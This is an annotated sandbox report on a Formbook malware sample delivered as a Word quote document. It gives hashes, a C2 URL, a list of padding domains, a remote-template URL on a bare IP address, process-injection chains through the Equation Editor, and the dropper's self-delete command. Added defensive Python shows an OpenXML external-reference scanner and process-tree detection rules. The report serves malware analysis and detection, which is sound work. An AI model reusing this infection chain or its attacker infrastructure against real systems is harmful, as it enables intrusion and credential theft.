Analysis
Max time kernel: 149s
Max time network: 150s
Platform: windows7_x64
Resource: win7v20210410
Submitted: 25-05-2021 11:47
Static task: static1
Behavioral task: behavioral1
  Sample: Quote 2405987021.docx
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: Quote 2405987021.docx
  Resource: win10v20210408
General
Target: Quote 2405987021.docx
Size: 10KB
MD5: 992acd038fd49f200bd5510c029e74b1
SHA1: f1a0abb5f96c21f8a799e4f65c4216bd968c29b7
SHA256: 5274c7fea16b84e327d5af683b6ef0c3e1fe1649b6cea88399e029ed5deeee6f
SHA512: e08e069138e70fc13ce97ccd1f5b99c763d5b23f90773f8248a4ca5b6e3dc3e71ef277f1dd365c71e58b960b221f0ff5479694baf10a66ca6079431ff84eef10
Malware Config

Extracted
  Family: formbook
  Version: 4.1
  C2: http://www.mpaiji.com/c244/
  Domains (the remaining entries of the extracted config; Formbook pads its configuration with domains that may belong to uninvolved sites, so use this list for hunting and correlation rather than as a blocklist):
ssgasija.com
procyoon.com
mood-street-food.com
yeglifeview.com
baoyai.com
sundarsheni.com
notoli.photography
sweetape.com
ergas.group
asyrill.com
jin188v.com
stlazarushospitalnola.com
dohertyfamily5.com
duniaclubs.club
ngobryles.com
scottsavocasalon.com
unifiui.com
baileyfred.com
nabiagency.com
alyssaternanphotography.com
whitehome-re.com
nitaraine.com
rklogtransportes.com
closetcouturenc.com
day.gallery
suxfi.com
mittikasaman.com
livesupgrade.com
hasbiadam.com
masdelafont-mauguio.com
topadofa.com
humanimmunogenomics.com
exit-blog.com
andersonsignandbannerco.com
ellasween.com
jmycjj.com
dhshk.com
peaceful-dolphin.com
flossydesigns.com
mrevivalkids.com
paintmehappywithcassandra.com
daishuaku.com
c2spot.com
odiaproduct.com
skillfultopshop.com
mentorbp.com
annualchecklist.com
jasaborongan.com
fasttrainheal.com
flatfootedhatting.com
brionreilly.com
ogcaterers.info
uuhlashwe.club
subsidy-kennwort.info
logisticmoversusa.com
houseofkabbalah.com
ahealingjournee.com
diemtinthitruong.com
naturallybossed.com
turksandcaicosdirect.com
hudsonvalleyfinearts.net
brocousa.com
getyourcostsdown.com
liveitupmusic.com
Signatures

Formbook Payload (3 IoCs)
  Resource / YARA rule:
    behavioral1/memory/1796-71-0x0000000000400000-0x000000000042E000-memory.dmp  formbook
    behavioral1/memory/1796-72-0x000000000041EB20-mapping.dmp  formbook
    behavioral1/memory/112-83-0x0000000000070000-0x000000000009E000-memory.dmp  formbook

Blocklisted process makes network request (1 IoC)
  Processes:
    flow 8  PID 1660  EQNEDT32.EXE

Downloads MZ/PE file

Executes dropped EXE (2 IoCs)
  Processes:
    PID 1964  vbc.exe
    PID 1796  vbc.exe
Abuses OpenXML format to download file from external location (2 IoCs)
  Processes:
    Key created  \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar  WINWORD.EXE
    Key opened   \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Office\Common\Offline\Files\http://198.46.132.185/..-.-.-......................................................-...-/..................................................wbk  WINWORD.EXE
  The Office\Common\Offline\Files key records the part Word resolved from a URL while opening the document. The target is a bare IP address with a path made of dots and dashes ending in wbk; that external reference is what this signature keys on. The fetched content itself is not among the files in this report.
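The signature above fires because Word resolved a document part from an external URL while loading the file. The following is an added example, not code from the report or from the sandbox, of a static check for the same condition: it walks every `.rels` part of an OpenXML package and reports relationships with TargetMode="External" whose target is remote, separating relationship types Office fetches on open (oleObject, attachedTemplate, image, frame, subDocument) from ordinary hyperlinks that only fire on a click. The sample package, its 192.0.2.10 target and the function names are constructed for this example. It finds the reference, not what the referenced file does, so the Equation Editor stage of this chain is outside its scope.

```python
"""Added example: find OpenXML relationships that make Office fetch a remote
part on open. Not from the report; the sample package below is constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Office resolves while loading the document. A hyperlink
# relationship is also External, but only fires when the user clicks it.
FETCH_ON_OPEN = {"oleObject", "attachedTemplate", "image", "frame", "subDocument"}
REMOTE_TARGET = re.compile(r"^(https?://|file://|\\\\)", re.I)


def external_relationships(docx_bytes):
    """Return (rels_part, rel_type, target, fetch_on_open) for each relationship
    in any .rels part that has TargetMode="External" and a remote target."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if not REMOTE_TARGET.match(target):
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append((name, rel_type, target, rel_type in FETCH_ON_OPEN))
    return findings


def verdict(docx_bytes):
    """'fetch-on-open' if any relationship is resolved at load time,
    'external-links-only' if only hyperlinks point outside, else 'clean'."""
    findings = external_relationships(docx_bytes)
    if any(fetch for _, _, _, fetch in findings):
        return "fetch-on-open"
    return "external-links-only" if findings else "clean"


def build_docx(rels_xml):
    """Constructed minimal package: only the parts the scanner needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


RELS_OPEN = '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
# Constructed: an OLE object whose data is fetched from 192.0.2.10 (a
# documentation address), plus an ordinary hyperlink for contrast.
MALICIOUS_RELS = RELS_OPEN + (
    f'<Relationship Id="rId1" Type="{OFFICE_REL}oleObject" '
    'Target="http://192.0.2.10/remote.wbk" TargetMode="External"/>'
    f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" '
    'Target="https://example.com/" TargetMode="External"/>'
    "</Relationships>"
)
BENIGN_RELS = RELS_OPEN + (
    f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
    "</Relationships>"
)

if __name__ == "__main__":
    for label, rels in (("constructed malicious", MALICIOUS_RELS), ("constructed benign", BENIGN_RELS)):
        doc = build_docx(rels)
        print(label, "->", verdict(doc), external_relationships(doc))
```

A real document has several `.rels` parts (the package root, `word/_rels/document.xml.rels`, settings, headers and footers), which is why the scanner walks all of them instead of only the main document relationships; an attachedTemplate reference lives in the settings part, not the document part.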
Loads dropped DLL (2 IoCs)
  Processes:
    PID 1660  EQNEDT32.EXE (2 events)

Uses the VBS compiler for execution (1 TTP)
  The signature is keyed on the image name vbc.exe. The file here is the dropped executable in C:\Users\Public (see Executes dropped EXE and the hashes under Downloads), not the Visual Basic compiler shipped in the .NET Framework directory, so treat it as a renamed payload rather than a living-off-the-land use of the real compiler.

Suspicious use of SetThreadContext (3 IoCs)
  Processes (source PID -> target PID):
    1964 vbc.exe -> 1796 vbc.exe
    1796 vbc.exe -> 1272 Explorer.EXE
    112 wscript.exe -> 1272 Explorer.EXE

Drops file in Windows directory (1 IoC)
  Processes:
    File opened for modification  C:\Windows\Debug\WIA\wiatrace.log  WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor (1 TTP, 1 IoC)
  Equation Editor (EQNEDT32.EXE) is a legacy Office component often targeted by exploits such as CVE-2017-11882.

Modifies Internet Explorer settings
  Processes (all keys below are under \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer and were written by WINWORD.EXE):
    Key created      Toolbar
    Key created      MenuExt\Se&nd to OneNote
    Set value (int)  MenuExt\Se&nd to OneNote\Contexts = "55"
    Set value (str)  MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"
    Set value (int)  MenuExt\E&xport to Microsoft Excel\Contexts = "1"
    Set value (str)  Toolbar\ShowDiscussionButton = "Yes"
    Key created      MenuExt
    Set value (str)  MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"
    Key created      MenuExt\E&xport to Microsoft Excel
  These are the standard Office 2010 context-menu registrations (Send to OneNote, Export to Microsoft Excel) that Word writes on first run in a fresh profile; they are sandbox noise, not behaviour of the sample.
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  PID 2020  WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (29 IoCs)
  PID 1796  vbc.exe (2 events)
  PID 112   wscript.exe (27 events)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 1272  Explorer.EXE

Suspicious behavior: MapViewOfSection (5 IoCs)
  PID 1796  vbc.exe (3 events)
  PID 112   wscript.exe (2 events)

Suspicious use of AdjustPrivilegeToken (7 IoCs)
  PID 1796  vbc.exe       SeDebugPrivilege
  PID 112   wscript.exe   SeDebugPrivilege
  PID 2020  WINWORD.EXE   SeShutdownPrivilege
  PID 1272  Explorer.EXE  SeShutdownPrivilege (4 events)

Suspicious use of FindShellTrayWindow (4 IoCs)
  PID 1272  Explorer.EXE (4 events)

Suspicious use of SendNotifyMessage (4 IoCs)
  PID 1272  Explorer.EXE (4 events)

Suspicious use of SetWindowsHookEx (3 IoCs)
  PID 2020  WINWORD.EXE (2 events)
  PID 1964  vbc.exe (1 event)

Suspicious use of WriteProcessMemory (23 IoCs)
  Source PID -> target PID (events):
    1660 EQNEDT32.EXE -> 1964 vbc.exe (4)
    1964 vbc.exe -> 1796 vbc.exe (7)
    2020 WINWORD.EXE -> 1784 splwow64.exe (4)
    1272 Explorer.EXE -> 112 wscript.exe (4)
    112 wscript.exe -> 1668 cmd.exe (4)
Processes

C:\Windows\Explorer.EXE (PID 1272)
  Command line: C:\Windows\Explorer.EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

  C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 2020)
    Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Quote 2405987021.docx"
    - Abuses OpenXML format to download file from external location
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Windows\splwow64.exe (PID 1784)
      Command line: C:\Windows\splwow64.exe 12288

  C:\Windows\SysWOW64\wscript.exe (PID 112)
    Command line: "C:\Windows\SysWOW64\wscript.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe (PID 1668)
      Command line: /c del "C:\Users\Public\vbc.exe"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE (PID 1660)
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory

  C:\Users\Public\vbc.exe (PID 1964)
    Command line: "C:\Users\Public\vbc.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Users\Public\vbc.exe (PID 1796)
      Command line: "C:\Users\Public\vbc.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken

Two points in this tree matter for detection. EQNEDT32.EXE appears as a separate root rather than as a child of WINWORD.EXE because the Equation Editor is started out of process through COM (the -Embedding switch), so a parent-child rule keyed on Word alone never sees the vbc.exe launch; the link to the document is the EQNEDT32.EXE -> vbc.exe WriteProcessMemory events, not a process parent. Second, the wscript.exe child of Explorer.EXE has no script argument: it is created after vbc.exe (PID 1796) sets the thread context of Explorer.EXE (PID 1272), and it in turn runs cmd.exe to delete the dropper from C:\Users\Public, so the cleanup step is attributable to injected code in the shell rather than to the shell itself.
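As an added example that is not part of the sandbox report, the process-creation and SetThreadContext events from the tree above can be replayed through a small set of detection rules: a child of EQNEDT32.EXE, execution from C:\Users\Public, a process setting the thread context of a child it created from the same image (the hollowing pattern between the two vbc.exe instances), SetThreadContext against Explorer.EXE, Explorer.EXE spawning a script host with no script argument, and cmd.exe deleting a file that previously executed. The event records are constructed from the PIDs and paths in this report; the event schema, field names and rule names are this example's own and do not correspond to any EDR product's format.

```python
"""Added example: replay the process tree above through a few detection rules.
The events are constructed from the PIDs and paths in this report; the event
schema and rule names are this example's own, not an EDR format."""
from dataclasses import dataclass
import re


@dataclass
class Event:
    kind: str                 # "create" or "set_thread_context"
    pid: int
    image: str                # full path of the acting process
    ppid: int = 0
    parent_image: str = ""
    cmdline: str = ""
    target_pid: int = 0       # only for set_thread_context


EQUATION_EDITOR = "eqnedt32.exe"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
PUBLIC_DIR = re.compile(r"^(?:[a-z]:)?\\users\\public\\", re.I)
DEL_ARG = re.compile(r'\bdel\s+"?([^"]+)"?', re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid, detail) tuples in event order."""
    alerts = []
    created = {e.pid: e for e in events if e.kind == "create"}
    executed = set()   # lower-cased image paths that have already run
    for e in events:
        if e.kind == "create":
            executed.add(e.image.lower())
            img, parent = basename(e.image), basename(e.parent_image)
            if parent == EQUATION_EDITOR:
                alerts.append(("equation_editor_child", e.pid, e.image))
            if PUBLIC_DIR.match(e.image):
                alerts.append(("exec_from_public", e.pid, e.image))
            bare = e.cmdline.strip().strip('"').lower()
            if parent == "explorer.exe" and img in SCRIPT_HOSTS and bare.endswith(img):
                # Script host started by the shell with nothing to run: typical of
                # injected code in explorer.exe spawning a host for itself.
                alerts.append(("explorer_spawns_script_host_no_args", e.pid, e.image))
            if img == "cmd.exe":
                m = DEL_ARG.search(e.cmdline)
                if m and m.group(1).lower() in executed:
                    alerts.append(("self_delete_dropped_exe", e.pid, m.group(1)))
        elif e.kind == "set_thread_context":
            src, tgt = created.get(e.pid), created.get(e.target_pid)
            if src and tgt and tgt.ppid == e.pid and tgt.image.lower() == src.image.lower():
                # A parent rewriting the thread context of a child it started
                # from its own image is the process-hollowing shape.
                alerts.append(("hollowing_same_image_child", e.pid, e.target_pid))
            elif tgt and basename(tgt.image) == "explorer.exe":
                alerts.append(("set_thread_context_on_explorer", e.pid, e.target_pid))
    return alerts


WORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
EQN = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"
EXPLORER = r"C:\Windows\Explorer.EXE"
WSCRIPT = r"C:\Windows\SysWOW64\wscript.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
DOC = r"C:\Users\Admin\AppData\Local\Temp\Quote 2405987021.docx"

# Constructed event stream following the report's process tree and its
# SetThreadContext table (EQNEDT32.EXE has no recorded parent there).
SAMPLE_EVENTS = [
    Event("create", 1272, EXPLORER, cmdline=EXPLORER),
    Event("create", 2020, WORD, 1272, EXPLORER, f'"{WORD}" /n "{DOC}"'),
    Event("create", 1660, EQN, cmdline=f'"{EQN}" -Embedding'),
    Event("create", 1964, VBC, 1660, EQN, f'"{VBC}"'),
    Event("create", 1796, VBC, 1964, VBC, f'"{VBC}"'),
    Event("set_thread_context", 1964, VBC, target_pid=1796),
    Event("set_thread_context", 1796, VBC, target_pid=1272),
    Event("create", 112, WSCRIPT, 1272, EXPLORER, f'"{WSCRIPT}"'),
    Event("set_thread_context", 112, WSCRIPT, target_pid=1272),
    Event("create", 1668, CMD, 112, WSCRIPT, f'/c del "{VBC}"'),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The rules deliberately do not depend on WINWORD.EXE being the parent of anything in the chain; as the tree shows, the Office side of this attack surfaces only through the Equation Editor's own child and its WriteProcessMemory activity.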
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Public\vbc.exe (the report lists this file five times, as C:\Users\Public\vbc.exe and \Users\Public\vbc.exe, with identical hashes)
  MD5: 9c0ab971e60116467107fe8dd787e5cf
  SHA1: 08aefe2b9ab89d7522a93e8a6e442ee3ceb85eee
  SHA256: ef4cb9aea5d837610a28160c179ef3c4f381f84a8cbdd3464563800c53a95f15
  SHA512: 0d18dd253bd46ec632da4388545fb8b2cfa958488c34a7416f674969a06c023828dc299046438981d54985bf0d8e9d675abb38e3f2905b48e73e4f0d6e131c63
Memory dumps (grouped by PID; size given where the report records one)
  memory/112-80-0x0000000000000000-mapping.dmp
  memory/112-82-0x00000000002D0000-0x00000000002F6000-memory.dmp  152KB
  memory/112-83-0x0000000000070000-0x000000000009E000-memory.dmp  184KB
  memory/112-84-0x0000000001F60000-0x0000000002263000-memory.dmp  3.0MB
  memory/112-85-0x0000000001E30000-0x0000000001EC3000-memory.dmp  588KB
  memory/1272-79-0x0000000004A10000-0x0000000004B93000-memory.dmp  1.5MB
  memory/1272-86-0x00000000062E0000-0x00000000063DC000-memory.dmp  1008KB
  memory/1660-63-0x0000000076281000-0x0000000076283000-memory.dmp  8KB
  memory/1668-81-0x0000000000000000-mapping.dmp
  memory/1784-74-0x0000000000000000-mapping.dmp
  memory/1784-76-0x000007FEFC141000-0x000007FEFC143000-memory.dmp  8KB
  memory/1796-71-0x0000000000400000-0x000000000042E000-memory.dmp  184KB
  memory/1796-72-0x000000000041EB20-mapping.dmp
  memory/1796-77-0x0000000000700000-0x0000000000A03000-memory.dmp  3.0MB
  memory/1796-78-0x0000000000250000-0x0000000000264000-memory.dmp  80KB
  memory/1964-66-0x0000000000000000-mapping.dmp
  memory/2020-60-0x0000000072C41000-0x0000000072C44000-memory.dmp  12KB
  memory/2020-61-0x00000000706C1000-0x00000000706C3000-memory.dmp  8KB
  memory/2020-62-0x000000005FFF0000-0x0000000060000000-memory.dmp  64KB
  memory/2020-87-0x000000005FFF0000-0x0000000060000000-memory.dmp  64KB